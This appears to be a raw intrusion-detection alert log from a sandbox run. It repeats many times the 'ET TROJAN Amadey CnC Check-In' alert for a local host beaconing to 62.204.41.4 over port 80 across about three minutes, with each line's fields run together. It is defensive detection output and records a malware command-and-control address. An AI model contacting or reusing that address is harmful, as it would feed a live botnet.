                            192.168.2.462.204.41.450040802027700 02/08/23-17:39:05.994783TCP2027700ET TROJAN Amadey CnC Check-In5004080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450081802027700 02/08/23-17:39:15.969624TCP2027700ET TROJAN Amadey CnC Check-In5008180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450288802027700 02/08/23-17:40:08.838915TCP2027700ET TROJAN Amadey CnC Check-In5028880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450294802027700 02/08/23-17:40:10.272901TCP2027700ET TROJAN Amadey CnC Check-In5029480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450123802027700 02/08/23-17:39:26.512749TCP2027700ET TROJAN Amadey CnC Check-In5012380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450279802027700 02/08/23-17:40:06.686450TCP2027700ET TROJAN Amadey CnC Check-In5027980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450108802027700 02/08/23-17:39:22.559760TCP2027700ET TROJAN Amadey CnC Check-In5010880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450206802027700 02/08/23-17:39:48.861882TCP2027700ET TROJAN Amadey CnC Check-In5020680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450308802027700 02/08/23-17:40:13.941053TCP2027700ET TROJAN Amadey CnC Check-In5030880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450291802027700 02/08/23-17:40:09.560444TCP2027700ET TROJAN Amadey CnC Check-In5029180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449891802027700 02/08/23-17:38:22.836955TCP2027700ET TROJAN Amadey CnC Check-In4989180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449761802027700 02/08/23-17:37:42.845742TCP2027700ET TROJAN Amadey CnC Check-In4976180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449831802027700 02/08/23-17:38:01.970314TCP2027700ET TROJAN Amadey CnC Check-In4983180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449701802027700 02/08/23-17:37:25.852741TCP2027700ET TROJAN Amadey CnC Check-In4970180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449885802027700 02/08/23-17:38:21.385215TCP2027700ET TROJAN Amadey CnC Check-In4988580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449914802027700 02/08/23-17:38:28.388086TCP2027700ET TROJAN Amadey CnC Check-In4991480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449955802027700 02/08/23-17:38:40.070472TCP2027700ET TROJAN Amadey CnC Check-In4995580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449996802027700 02/08/23-17:38:55.320994TCP2027700ET TROJAN Amadey CnC Check-In4999680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450266802027700 02/08/23-17:40:03.436704TCP2027700ET TROJAN Amadey CnC Check-In5026680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449720802027700 02/08/23-17:37:30.557563TCP2027700ET TROJAN Amadey CnC Check-In4972080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450320802027700 02/08/23-17:40:18.911019TCP2027700ET TROJAN Amadey CnC Check-In5032080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450225802027700 02/08/23-17:39:53.481402TCP2027700ET TROJAN Amadey CnC Check-In5022580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450219802027700 02/08/23-17:39:52.017413TCP2027700ET TROJAN Amadey CnC Check-In5021980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450006802027700 02/08/23-17:38:57.717411TCP2027700ET TROJAN Amadey CnC Check-In5000680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450012802027700 02/08/23-17:38:59.182172TCP2027700ET TROJAN Amadey CnC Check-In5001280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450053802027700 02/08/23-17:39:09.121134TCP2027700ET TROJAN Amadey CnC Check-In5005380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450177802027700 02/08/23-17:39:40.085027TCP2027700ET TROJAN Amadey CnC Check-In5017780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450136802027700 02/08/23-17:39:29.705547TCP2027700ET TROJAN Amadey CnC Check-In5013680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450281802027700 02/08/23-17:40:07.173251TCP2027700ET TROJAN Amadey CnC Check-In5028180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450024802027700 02/08/23-17:39:02.100310TCP2027700ET TROJAN Amadey CnC Check-In5002480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450137802027700 02/08/23-17:39:29.950707TCP2027700ET TROJAN Amadey CnC Check-In5013780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450220802027700 02/08/23-17:39:52.269838TCP2027700ET TROJAN Amadey CnC Check-In5022080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449714802027700 02/08/23-17:37:29.062382TCP2027700ET TROJAN Amadey CnC Check-In4971480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450042802027700 02/08/23-17:39:06.484997TCP2027700ET TROJAN Amadey CnC Check-In5004280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450119802027700 02/08/23-17:39:25.527748TCP2027700ET TROJAN Amadey CnC Check-In5011980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449840802027700 02/08/23-17:38:07.481729TCP2027700ET TROJAN Amadey CnC Check-In4984080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450198802027700 02/08/23-17:39:46.952790TCP2027700ET TROJAN Amadey CnC Check-In5019880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450315802027700 02/08/23-17:40:17.704525TCP2027700ET TROJAN Amadey CnC Check-In5031580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449812802027700 02/08/23-17:37:57.432480TCP2027700ET TROJAN Amadey CnC Check-In4981280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449729802027700 02/08/23-17:37:35.078277TCP2027700ET TROJAN Amadey CnC Check-In4972980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450155802027700 02/08/23-17:39:34.245100TCP2027700ET TROJAN Amadey CnC Check-In5015580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450070802027700 02/08/23-17:39:13.299293TCP2027700ET TROJAN Amadey CnC Check-In5007080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449986802027700 02/08/23-17:38:51.969969TCP2027700ET TROJAN Amadey CnC Check-In4998680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450333802027700 02/08/23-17:40:22.114217TCP2027700ET TROJAN Amadey CnC Check-In5033380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449981802027700 02/08/23-17:38:49.709877TCP2027700ET TROJAN Amadey CnC Check-In4998180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449907802027700 02/08/23-17:38:26.684813TCP2027700ET TROJAN Amadey CnC Check-In4990780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449785802027700 02/08/23-17:37:48.607664TCP2027700ET TROJAN Amadey CnC Check-In4978580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450253802027700 02/08/23-17:40:00.282450TCP2027700ET TROJAN Amadey CnC Check-In5025380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449925802027700 02/08/23-17:38:31.225194TCP2027700ET TROJAN Amadey CnC Check-In4992580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450075802027700 02/08/23-17:39:14.493858TCP2027700ET TROJAN Amadey CnC Check-In5007580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450014802027700 02/08/23-17:38:59.675888TCP2027700ET TROJAN Amadey CnC Check-In5001480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450210802027700 02/08/23-17:39:49.826813TCP2027700ET TROJAN Amadey CnC Check-In5021080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449917802027700 02/08/23-17:38:29.103690TCP2027700ET TROJAN Amadey CnC Check-In4991780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450109802027700 02/08/23-17:39:22.797984TCP2027700ET TROJAN Amadey CnC Check-In5010980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450305802027700 02/08/23-17:40:12.988863TCP2027700ET TROJAN Amadey CnC Check-In5030580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449830802027700 02/08/23-17:38:01.731970TCP2027700ET TROJAN Amadey CnC Check-In4983080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450193802027700 02/08/23-17:39:45.766476TCP2027700ET TROJAN Amadey CnC Check-In5019380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449793802027700 02/08/23-17:37:50.723015TCP2027700ET TROJAN Amadey CnC Check-In4979380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450032802027700 02/08/23-17:39:04.057616TCP2027700ET TROJAN Amadey CnC Check-In5003280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449898802027700 02/08/23-17:38:24.505533TCP2027700ET TROJAN Amadey CnC Check-In4989880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449752802027700 02/08/23-17:37:40.700038TCP2027700ET TROJAN Amadey CnC Check-In4975280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449935802027700 02/08/23-17:38:35.242769TCP2027700ET TROJAN Amadey CnC Check-In4993580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449739802027700 02/08/23-17:37:37.573322TCP2027700ET TROJAN Amadey CnC Check-In4973980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449971802027700 02/08/23-17:38:47.051646TCP2027700ET TROJAN Amadey CnC Check-In4997180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449958802027700 02/08/23-17:38:40.811347TCP2027700ET TROJAN Amadey CnC Check-In4995880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450080802027700 02/08/23-17:39:15.721319TCP2027700ET TROJAN Amadey CnC Check-In5008080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449976802027700 02/08/23-17:38:48.242353TCP2027700ET TROJAN Amadey CnC Check-In4997680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450127802027700 02/08/23-17:39:27.463619TCP2027700ET TROJAN Amadey CnC Check-In5012780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449775802027700 02/08/23-17:37:46.222862TCP2027700ET TROJAN Amadey CnC Check-In4977580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449757802027700 02/08/23-17:37:41.898387TCP2027700ET TROJAN Amadey CnC Check-In4975780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449953802027700 02/08/23-17:38:39.587593TCP2027700ET TROJAN Amadey CnC Check-In4995380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449795802027700 02/08/23-17:37:51.324909TCP2027700ET TROJAN Amadey CnC Check-In4979580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449798802027700 02/08/23-17:37:52.895060TCP2027700ET TROJAN Amadey CnC Check-In4979880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449737802027700 02/08/23-17:37:37.044350TCP2027700ET TROJAN Amadey CnC Check-In4973780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450157802027700 02/08/23-17:39:34.733706TCP2027700ET TROJAN Amadey CnC Check-In5015780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449930802027700 02/08/23-17:38:33.757165TCP2027700ET TROJAN Amadey CnC Check-In4993080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450065802027700 02/08/23-17:39:12.112270TCP2027700ET TROJAN Amadey CnC Check-In5006580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449973802027700 02/08/23-17:38:47.525350TCP2027700ET TROJAN Amadey CnC Check-In4997380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450200802027700 02/08/23-17:39:47.437016TCP2027700ET TROJAN Amadey CnC Check-In5020080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449881802027700 02/08/23-17:38:20.412227TCP2027700ET TROJAN Amadey CnC Check-In4988180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449829802027700 02/08/23-17:38:01.495962TCP2027700ET TROJAN Amadey CnC Check-In4982980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449948802027700 02/08/23-17:38:38.400423TCP2027700ET TROJAN Amadey CnC Check-In4994880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450215802027700 02/08/23-17:39:51.044011TCP2027700ET TROJAN Amadey CnC Check-In5021580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450129802027700 02/08/23-17:39:27.963603TCP2027700ET TROJAN Amadey CnC Check-In5012980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449945802027700 02/08/23-17:38:37.668635TCP2027700ET TROJAN Amadey CnC Check-In4994580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450307802027700 02/08/23-17:40:13.620720TCP2027700ET TROJAN Amadey CnC Check-In5030780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450022802027700 02/08/23-17:39:01.616779TCP2027700ET TROJAN Amadey CnC Check-In5002280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450037802027700 02/08/23-17:39:05.274551TCP2027700ET TROJAN Amadey CnC Check-In5003780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450093802027700 02/08/23-17:39:18.875584TCP2027700ET TROJAN Amadey CnC Check-In5009380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450178802027700 02/08/23-17:39:40.855898TCP2027700ET TROJAN Amadey CnC Check-In5017880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449762802027700 02/08/23-17:37:43.088898TCP2027700ET TROJAN Amadey CnC Check-In4976280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449767802027700 02/08/23-17:37:44.322427TCP2027700ET TROJAN Amadey CnC Check-In4976780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450230802027700 02/08/23-17:39:54.670214TCP2027700ET TROJAN Amadey CnC Check-In5023080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450090802027700 02/08/23-17:39:18.150814TCP2027700ET TROJAN Amadey CnC Check-In5009080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449940802027700 02/08/23-17:38:36.464020TCP2027700ET TROJAN Amadey CnC Check-In4994080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450302802027700 02/08/23-17:40:12.239778TCP2027700ET TROJAN Amadey CnC Check-In5030280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450271802027700 02/08/23-17:40:04.731947TCP2027700ET TROJAN Amadey CnC Check-In5027180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449724802027700 02/08/23-17:37:31.965740TCP2027700ET TROJAN Amadey CnC Check-In4972480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450052802027700 02/08/23-17:39:08.886987TCP2027700ET TROJAN Amadey CnC Check-In5005280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449902802027700 02/08/23-17:38:25.464005TCP2027700ET TROJAN Amadey CnC Check-In4990280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450011802027700 02/08/23-17:38:58.917493TCP2027700ET TROJAN Amadey CnC Check-In5001180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449943802027700 02/08/23-17:38:37.183501TCP2027700ET TROJAN Amadey CnC Check-In4994380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450124802027700 02/08/23-17:39:26.754787TCP2027700ET TROJAN Amadey CnC Check-In5012480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449765802027700 02/08/23-17:37:43.792451TCP2027700ET TROJAN Amadey CnC Check-In4976580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450060802027700 02/08/23-17:39:10.906200TCP2027700ET TROJAN Amadey CnC Check-In5006080192.168.2.462.204.41.4
                            192.168.2.462.204.41.450202802027700 02/08/23-17:39:47.905016TCP2027700ET TROJAN Amadey CnC Check-In5020280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449790802027700 02/08/23-17:37:49.827327TCP2027700ET TROJAN Amadey CnC Check-In4979080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449802802027700 02/08/23-17:37:55.075474TCP2027700ET TROJAN Amadey CnC Check-In4980280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450165802027700 02/08/23-17:39:36.727772TCP2027700ET TROJAN Amadey CnC Check-In5016580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449843802027700 02/08/23-17:38:08.255380TCP2027700ET TROJAN Amadey CnC Check-In4984380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449915802027700 02/08/23-17:38:28.630926TCP2027700ET TROJAN Amadey CnC Check-In4991580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450243802027700 02/08/23-17:39:57.826941TCP2027700ET TROJAN Amadey CnC Check-In5024380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450223802027700 02/08/23-17:39:53.012602TCP2027700ET TROJAN Amadey CnC Check-In5022380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449861802027700 02/08/23-17:38:15.536359TCP2027700ET TROJAN Amadey CnC Check-In4986180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449950802027700 02/08/23-17:38:38.867192TCP2027700ET TROJAN Amadey CnC Check-In4995080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449867802027700 02/08/23-17:38:16.999762TCP2027700ET TROJAN Amadey CnC Check-In4986780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449956802027700 02/08/23-17:38:40.308350TCP2027700ET TROJAN Amadey CnC Check-In4995680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449778802027700 02/08/23-17:37:46.936137TCP2027700ET TROJAN Amadey CnC Check-In4977880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450045802027700 02/08/23-17:39:07.221259TCP2027700ET TROJAN Amadey CnC Check-In5004580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450116802027700 02/08/23-17:39:24.518582TCP2027700ET TROJAN Amadey CnC Check-In5011680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450312802027700 02/08/23-17:40:15.535341TCP2027700ET TROJAN Amadey CnC Check-In5031280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450134802027700 02/08/23-17:39:29.223273TCP2027700ET TROJAN Amadey CnC Check-In5013480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450027802027700 02/08/23-17:39:02.823442TCP2027700ET TROJAN Amadey CnC Check-In5002780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449922802027700 02/08/23-17:38:30.286333TCP2027700ET TROJAN Amadey CnC Check-In4992280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449928802027700 02/08/23-17:38:32.721034TCP2027700ET TROJAN Amadey CnC Check-In4992880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449833802027700 02/08/23-17:38:02.749209TCP2027700ET TROJAN Amadey CnC Check-In4983380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450100802027700 02/08/23-17:39:20.589445TCP2027700ET TROJAN Amadey CnC Check-In5010080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449989802027700 02/08/23-17:38:53.655632TCP2027700ET TROJAN Amadey CnC Check-In4998980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449744802027700 02/08/23-17:37:38.778108TCP2027700ET TROJAN Amadey CnC Check-In4974480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450144802027700 02/08/23-17:39:31.611275TCP2027700ET TROJAN Amadey CnC Check-In5014480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449810802027700 02/08/23-17:37:56.966034TCP2027700ET TROJAN Amadey CnC Check-In4981080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449721802027700 02/08/23-17:37:31.055128TCP2027700ET TROJAN Amadey CnC Check-In4972180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450233802027700 02/08/23-17:39:55.389175TCP2027700ET TROJAN Amadey CnC Check-In5023380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449782802027700 02/08/23-17:37:47.887596TCP2027700ET TROJAN Amadey CnC Check-In4978280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450239802027700 02/08/23-17:39:56.854078TCP2027700ET TROJAN Amadey CnC Check-In5023980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449871802027700 02/08/23-17:38:17.959791TCP2027700ET TROJAN Amadey CnC Check-In4987180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450274802027700 02/08/23-17:40:05.455951TCP2027700ET TROJAN Amadey CnC Check-In5027480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450251802027700 02/08/23-17:39:59.807891TCP2027700ET TROJAN Amadey CnC Check-In5025180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449839802027700 02/08/23-17:38:07.247675TCP2027700ET TROJAN Amadey CnC Check-In4983980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449960802027700 02/08/23-17:38:41.382110TCP2027700ET TROJAN Amadey CnC Check-In4996080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449709802027700 02/08/23-17:37:27.822243TCP2027700ET TROJAN Amadey CnC Check-In4970980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450185802027700 02/08/23-17:39:43.888646TCP2027700ET TROJAN Amadey CnC Check-In5018580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450328802027700 02/08/23-17:40:20.835288TCP2027700ET TROJAN Amadey CnC Check-In5032880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450055802027700 02/08/23-17:39:09.713048TCP2027700ET TROJAN Amadey CnC Check-In5005580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450096802027700 02/08/23-17:39:19.609784TCP2027700ET TROJAN Amadey CnC Check-In5009680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450162802027700 02/08/23-17:39:35.950587TCP2027700ET TROJAN Amadey CnC Check-In5016280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449805802027700 02/08/23-17:37:55.775945TCP2027700ET TROJAN Amadey CnC Check-In4980580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450073802027700 02/08/23-17:39:14.025211TCP2027700ET TROJAN Amadey CnC Check-In5007380192.168.2.462.204.41.4
                            192.168.2.462.204.41.450335802027700 02/08/23-17:40:22.600566TCP2027700ET TROJAN Amadey CnC Check-In5033580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450205802027700 02/08/23-17:39:48.611499TCP2027700ET TROJAN Amadey CnC Check-In5020580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449912802027700 02/08/23-17:38:27.898909TCP2027700ET TROJAN Amadey CnC Check-In4991280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449823802027700 02/08/23-17:38:00.063010TCP2027700ET TROJAN Amadey CnC Check-In4982380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449994802027700 02/08/23-17:38:54.852514TCP2027700ET TROJAN Amadey CnC Check-In4999480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449716802027700 02/08/23-17:37:29.564268TCP2027700ET TROJAN Amadey CnC Check-In4971680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449731802027700 02/08/23-17:37:35.554583TCP2027700ET TROJAN Amadey CnC Check-In4973180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449734802027700 02/08/23-17:37:36.292013TCP2027700ET TROJAN Amadey CnC Check-In4973480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450004802027700 02/08/23-17:38:57.228666TCP2027700ET TROJAN Amadey CnC Check-In5000480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450001802027700 02/08/23-17:38:56.508014TCP2027700ET TROJAN Amadey CnC Check-In5000180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449991802027700 02/08/23-17:38:54.132077TCP2027700ET TROJAN Amadey CnC Check-In4999180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450261802027700 02/08/23-17:40:02.232461TCP2027700ET TROJAN Amadey CnC Check-In5026180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450172802027700 02/08/23-17:39:38.433749TCP2027700ET TROJAN Amadey CnC Check-In5017280192.168.2.462.204.41.4
                            192.168.2.462.204.41.450175802027700 02/08/23-17:39:39.452531TCP2027700ET TROJAN Amadey CnC Check-In5017580192.168.2.462.204.41.4
                            192.168.2.462.204.41.450338802027700 02/08/23-17:40:23.333402TCP2027700ET TROJAN Amadey CnC Check-In5033880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450264802027700 02/08/23-17:40:02.955746TCP2027700ET TROJAN Amadey CnC Check-In5026480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450249802027700 02/08/23-17:39:59.294790TCP2027700ET TROJAN Amadey CnC Check-In5024980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450086802027700 02/08/23-17:39:17.186333TCP2027700ET TROJAN Amadey CnC Check-In5008680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449706802027700 02/08/23-17:37:27.103524TCP2027700ET TROJAN Amadey CnC Check-In4970680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450322802027700 02/08/23-17:40:19.378355TCP2027700ET TROJAN Amadey CnC Check-In5032280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449963802027700 02/08/23-17:38:45.131886TCP2027700ET TROJAN Amadey CnC Check-In4996380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449966802027700 02/08/23-17:38:45.850942TCP2027700ET TROJAN Amadey CnC Check-In4996680192.168.2.462.204.41.4
                            192.168.2.462.204.41.449703802027700 02/08/23-17:37:26.386152TCP2027700ET TROJAN Amadey CnC Check-In4970380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449877802027700 02/08/23-17:38:19.428227TCP2027700ET TROJAN Amadey CnC Check-In4987780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449874802027700 02/08/23-17:38:18.694725TCP2027700ET TROJAN Amadey CnC Check-In4987480192.168.2.462.204.41.4
                            192.168.2.462.204.41.450147802027700 02/08/23-17:39:32.357168TCP2027700ET TROJAN Amadey CnC Check-In5014780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450017802027700 02/08/23-17:39:00.402673TCP2027700ET TROJAN Amadey CnC Check-In5001780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449788802027700 02/08/23-17:37:49.340408TCP2027700ET TROJAN Amadey CnC Check-In4978880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449747802027700 02/08/23-17:37:39.514163TCP2027700ET TROJAN Amadey CnC Check-In4974780192.168.2.462.204.41.4
                            192.168.2.462.204.41.450188802027700 02/08/23-17:39:44.592465TCP2027700ET TROJAN Amadey CnC Check-In5018880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450325802027700 02/08/23-17:40:20.110521TCP2027700ET TROJAN Amadey CnC Check-In5032580192.168.2.462.204.41.4
                            192.168.2.462.204.41.449699802027700 02/08/23-17:37:25.386825TCP2027700ET TROJAN Amadey CnC Check-In4969980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450058802027700 02/08/23-17:39:10.419596TCP2027700ET TROJAN Amadey CnC Check-In5005880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450236802027700 02/08/23-17:39:56.097184TCP2027700ET TROJAN Amadey CnC Check-In5023680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450106802027700 02/08/23-17:39:22.067217TCP2027700ET TROJAN Amadey CnC Check-In5010680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450277802027700 02/08/23-17:40:06.202209TCP2027700ET TROJAN Amadey CnC Check-In5027780192.168.2.462.204.41.4
                            192.168.2.462.204.41.449938802027700 02/08/23-17:38:35.977194TCP2027700ET TROJAN Amadey CnC Check-In4993880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450083802027700 02/08/23-17:39:16.450190TCP2027700ET TROJAN Amadey CnC Check-In5008380192.168.2.462.204.41.4
                            192.168.2.462.204.41.449808802027700 02/08/23-17:37:56.496601TCP2027700ET TROJAN Amadey CnC Check-In4980880192.168.2.462.204.41.4
                            192.168.2.462.204.41.449719802027700 02/08/23-17:37:30.308623TCP2027700ET TROJAN Amadey CnC Check-In4971980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450099802027700 02/08/23-17:39:20.353141TCP2027700ET TROJAN Amadey CnC Check-In5009980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449979802027700 02/08/23-17:38:49.239264TCP2027700ET TROJAN Amadey CnC Check-In4997980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449849802027700 02/08/23-17:38:10.042740TCP2027700ET TROJAN Amadey CnC Check-In4984980192.168.2.462.204.41.4
                            192.168.2.462.204.41.449820802027700 02/08/23-17:37:59.355921TCP2027700ET TROJAN Amadey CnC Check-In4982080192.168.2.462.204.41.4
                            192.168.2.462.204.41.449772802027700 02/08/23-17:37:45.513154TCP2027700ET TROJAN Amadey CnC Check-In4977280192.168.2.462.204.41.4
                            192.168.2.462.204.41.449751802027700 02/08/23-17:37:40.464030TCP2027700ET TROJAN Amadey CnC Check-In4975180192.168.2.462.204.41.4
                            192.168.2.462.204.41.449879802027700 02/08/23-17:38:19.911856TCP2027700ET TROJAN Amadey CnC Check-In4987980192.168.2.462.204.41.4
                            192.168.2.462.204.41.450051802027700 02/08/23-17:39:08.654162TCP2027700ET TROJAN Amadey CnC Check-In5005180192.168.2.462.204.41.4
                            192.168.2.462.204.41.450208802027700 02/08/23-17:39:49.326377TCP2027700ET TROJAN Amadey CnC Check-In5020880192.168.2.462.204.41.4
                            192.168.2.462.204.41.450306802027700 02/08/23-17:40:13.234357TCP2027700ET TROJAN Amadey CnC Check-In5030680192.168.2.462.204.41.4
                            192.168.2.462.204.41.450244802027700 02/08/23-17:39:58.067517TCP2027700ET TROJAN Amadey CnC Check-In5024480192.168.2.462.204.41.4
                            192.168.2.462.204.41.449723802027700 02/08/23-17:37:31.619066TCP2027700ET TROJAN Amadey CnC Check-In4972380192.168.2.462.204.41.4
